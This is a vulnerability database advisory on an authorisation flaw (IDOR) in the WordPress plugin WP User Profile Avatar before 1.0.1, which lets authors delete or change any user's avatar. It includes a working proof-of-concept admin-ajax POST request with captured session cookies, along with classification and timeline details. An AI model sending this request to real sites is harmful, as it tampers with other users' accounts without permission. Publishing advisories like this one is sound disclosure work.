WordPress Plugin Vulnerabilities
WP User Profile Avatar < 1.0.1 - Author+ Avatar Deletion/Update via IDOR
Description
The plugin does not properly check for authorisation, allowing authors to delete and update arbitrary avatar
Proof of Concept
POC request: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: your_site User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849 Content-Length: 472 Origin: http://your_site DNT: 1 Connection: close Referer: http://your_site/wordpress/?p=873 Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="action" remove_user_avatar # here you can add update_user_avatar and change avatar of user by id from AUTHOR account -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="form_data" wpupa_url=&wpupa_attachment_id=875&user_id=1 -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="security" 3f855e1991 -----------------------------49182745140183315063494246849--
Affects Plugins
References
Classification
Type
IDOR
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-29 (about 4 months ago)
Added
2023-12-29 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)